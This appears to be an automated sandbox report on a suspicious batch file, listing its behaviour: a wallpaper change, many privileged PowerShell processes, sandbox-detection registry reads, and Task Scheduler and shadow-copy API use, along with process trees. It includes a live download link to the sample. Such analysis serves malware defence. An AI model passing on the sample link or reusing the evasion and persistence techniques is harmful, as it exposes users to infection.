Analysis
-
max time kernel
289s -
max time network
291s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250410-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250410-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
02/05/2025, 10:53
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
Resource
win10ltsc2021-20250410-en
Behavioral task
behavioral3
Sample
https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
Resource
win11-20250410-en
Errors
General
-
Target
https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
Malware Config
Signatures
-
Sets desktop wallpaper using registry 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-137520623-1834890667-2396102459-1000\Control Panel\Desktop\Wallpaper = "C:\\magnus\\matrix.bmp" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-137520623-1834890667-2396102459-1000\Control Panel\Desktop\Wallpaper = "C:\\magnus\\matrix.bmp" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-137520623-1834890667-2396102459-1000\Control Panel\Desktop\Wallpaper = "C:\\magnus\\matrix.bmp" reg.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\zh_HK\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ko\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\be\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\128.png msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_964958906\crl-set msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_964958906\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\hy\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\gl\messages.json msedge.exe File opened for modification C:\Windows\SystemTemp msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\tr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\zh_CN\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_11403964\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_908948130\autofill_bypass_cache_forms.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\hr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_11403964\arbitration_metadata.txt msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\eu\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\da\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\th\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\az\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ne\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_metadata\verified_contents.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_908948130\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ca\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_2063186466\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_908948130\regex_patterns.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\id\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ms\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\en_US\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\page_embed_script.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\cy\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ru\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\sr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\et\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\fr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1469398533\deny_domains.list msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_908948130\v1FieldTypes.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\lo\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\am\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\fa\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\pl\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\nl\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1469398533\deny_etld1_domains.list msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_908948130\edge_autofill_global_block_list.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\es_419\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\my\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\en_GB\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\hu\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\gu\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\es\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\en_CA\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_437608724\_metadata\verified_contents.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ml\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\fi\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_908948130\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\ja\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\fil\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\mn\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\mr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\no\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_437608724\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\pt_PT\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\pt_BR\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3892_1577736014\_locales\km\messages.json msedge.exe -
pid Process 188 powershell.exe 6536 powershell.exe 4580 powershell.exe 7544 powershell.exe 7256 powershell.exe 9032 powershell.exe 9140 powershell.exe 10068 powershell.exe 7084 powershell.exe 8632 powershell.exe 9272 powershell.exe 10200 powershell.exe 10340 powershell.exe 6684 powershell.exe 6940 powershell.exe 8372 powershell.exe 8496 powershell.exe 9508 powershell.exe 10348 powershell.exe 1704 powershell.exe 7804 powershell.exe 7656 powershell.exe 5812 powershell.exe 4228 powershell.exe 6248 powershell.exe 9908 powershell.exe 3972 powershell.exe 4324 powershell.exe 7672 powershell.exe 8032 powershell.exe 8236 powershell.exe 440 powershell.exe 6552 powershell.exe 8012 powershell.exe 9540 powershell.exe 9396 powershell.exe 5112 powershell.exe 6956 powershell.exe 8756 powershell.exe 4628 powershell.exe 5844 powershell.exe 7908 powershell.exe 9408 powershell.exe 2344 powershell.exe 7280 powershell.exe 9936 powershell.exe 5860 powershell.exe 6408 powershell.exe 6820 powershell.exe 8072 powershell.exe 9168 powershell.exe 6256 powershell.exe 8760 powershell.exe 5444 powershell.exe 6564 powershell.exe 7416 powershell.exe 7940 powershell.exe 8896 powershell.exe 9808 powershell.exe 3764 powershell.exe 6528 powershell.exe 9680 powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4276 powershell.exe 712 powershell.exe 784 powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 18 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "58" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133906568138381664" msedge.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-137520623-1834890667-2396102459-1000\{B1A8B0B8-C3C8-4A70-96CE-EC95FC4F6072} msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-137520623-1834890667-2396102459-1000\{C7599DDF-BF70-46A0-B2B5-4DEBAD9AA986} msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-137520623-1834890667-2396102459-1000\{4E199AB1-8965-4032-9156-73C01C0E33B3} msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3548 msedge.exe 3548 msedge.exe 4276 powershell.exe 4276 powershell.exe 4276 powershell.exe 4680 powershell.exe 4680 powershell.exe 4680 powershell.exe 712 powershell.exe 712 powershell.exe 712 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 908 powershell.exe 908 powershell.exe 908 powershell.exe 4628 powershell.exe 4628 powershell.exe 4628 powershell.exe 440 powershell.exe 440 powershell.exe 440 powershell.exe 5844 powershell.exe 5844 powershell.exe 5844 powershell.exe 3764 powershell.exe 3764 powershell.exe 3764 powershell.exe 5444 powershell.exe 5444 powershell.exe 5444 powershell.exe 3972 powershell.exe 3972 powershell.exe 3972 powershell.exe 1704 powershell.exe 1704 powershell.exe 1704 powershell.exe 4324 powershell.exe 4324 powershell.exe 4324 powershell.exe 188 powershell.exe 188 powershell.exe 188 powershell.exe 5812 powershell.exe 5812 powershell.exe 5812 powershell.exe 5112 powershell.exe 5112 powershell.exe 5112 powershell.exe 4228 powershell.exe 4228 powershell.exe 4228 powershell.exe 5860 powershell.exe 5860 powershell.exe 5860 powershell.exe 2344 powershell.exe 2344 powershell.exe 2344 powershell.exe 6256 powershell.exe 6256 powershell.exe 6256 powershell.exe 6408 powershell.exe 6408 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
pid Process 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4276 powershell.exe Token: SeDebugPrivilege 4680 powershell.exe Token: SeDebugPrivilege 712 powershell.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeDebugPrivilege 908 powershell.exe Token: SeDebugPrivilege 4628 powershell.exe Token: SeDebugPrivilege 440 powershell.exe Token: SeDebugPrivilege 5844 powershell.exe Token: SeDebugPrivilege 3764 powershell.exe Token: SeDebugPrivilege 5444 powershell.exe Token: SeDebugPrivilege 3972 powershell.exe Token: SeDebugPrivilege 1704 powershell.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeDebugPrivilege 188 powershell.exe Token: SeDebugPrivilege 5812 powershell.exe Token: SeDebugPrivilege 5112 powershell.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeDebugPrivilege 5860 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 6256 powershell.exe Token: SeDebugPrivilege 6408 powershell.exe Token: SeDebugPrivilege 6552 powershell.exe Token: SeDebugPrivilege 6684 powershell.exe Token: SeDebugPrivilege 6820 powershell.exe Token: SeDebugPrivilege 6956 powershell.exe Token: SeDebugPrivilege 7084 powershell.exe Token: SeDebugPrivilege 6248 powershell.exe Token: SeDebugPrivilege 6564 powershell.exe Token: SeDebugPrivilege 6940 powershell.exe Token: SeDebugPrivilege 6536 powershell.exe Token: SeDebugPrivilege 6528 powershell.exe Token: SeDebugPrivilege 7280 powershell.exe Token: SeDebugPrivilege 7416 powershell.exe Token: SeDebugPrivilege 7544 powershell.exe Token: SeDebugPrivilege 7672 powershell.exe Token: SeDebugPrivilege 7804 powershell.exe Token: SeDebugPrivilege 7940 powershell.exe Token: SeDebugPrivilege 8072 powershell.exe Token: SeDebugPrivilege 7256 powershell.exe Token: SeDebugPrivilege 7656 powershell.exe Token: SeDebugPrivilege 8032 powershell.exe Token: SeDebugPrivilege 7908 powershell.exe Token: SeDebugPrivilege 8236 powershell.exe Token: SeDebugPrivilege 8372 powershell.exe Token: SeDebugPrivilege 8496 powershell.exe Token: SeDebugPrivilege 8632 powershell.exe Token: SeDebugPrivilege 8760 powershell.exe Token: SeDebugPrivilege 8896 powershell.exe Token: SeDebugPrivilege 9032 powershell.exe Token: SeDebugPrivilege 9168 powershell.exe Token: SeDebugPrivilege 8012 powershell.exe Token: SeDebugPrivilege 8756 powershell.exe Token: SeDebugPrivilege 9140 powershell.exe Token: SeDebugPrivilege 4580 powershell.exe Token: SeDebugPrivilege 9272 powershell.exe Token: SeDebugPrivilege 9408 powershell.exe Token: SeDebugPrivilege 9540 powershell.exe Token: SeDebugPrivilege 9680 powershell.exe Token: SeDebugPrivilege 9808 powershell.exe Token: SeDebugPrivilege 9936 powershell.exe Token: SeDebugPrivilege 10068 powershell.exe Token: SeDebugPrivilege 10200 powershell.exe Token: SeDebugPrivilege 9508 powershell.exe Token: SeDebugPrivilege 9908 powershell.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
pid Process 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 3892 msedge.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 3892 msedge.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe 9392 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2624 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3892 wrote to memory of 240 3892 msedge.exe 82 PID 3892 wrote to memory of 240 3892 msedge.exe 82 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 2368 3892 msedge.exe 84 PID 3892 wrote to memory of 2368 3892 msedge.exe 84 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 5832 3892 msedge.exe 83 PID 3892 wrote to memory of 3968 3892 msedge.exe 85 PID 3892 wrote to memory of 3968 3892 msedge.exe 85 PID 3892 wrote to memory of 3968 3892 msedge.exe 85 PID 3892 wrote to memory of 3968 3892 msedge.exe 85 PID 3892 wrote to memory of 3968 3892 msedge.exe 85 PID 3892 wrote to memory of 3968 3892 msedge.exe 85 PID 3892 wrote to memory of 3968 3892 msedge.exe 85 PID 3892 wrote to memory of 3968 3892 msedge.exe 85 PID 3892 wrote to memory of 3968 3892 msedge.exe 85 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file1⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x31c,0x7ffdbf0cf208,0x7ffdbf0cf214,0x7ffdbf0cf2202⤵PID:240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2056,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2052 /prefetch:22⤵PID:5832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1936,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:32⤵PID:2368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2552,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:82⤵PID:3968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3440,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:12⤵PID:5852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:12⤵PID:2604
-
-
